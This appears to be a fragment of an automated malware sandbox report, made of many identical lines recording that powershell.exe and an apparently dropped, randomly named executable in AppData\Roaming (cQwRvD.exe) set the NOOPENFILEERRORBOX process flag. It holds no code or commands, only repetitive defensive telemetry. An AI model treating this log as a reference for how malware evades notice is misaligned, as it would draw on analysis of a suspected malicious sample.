Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
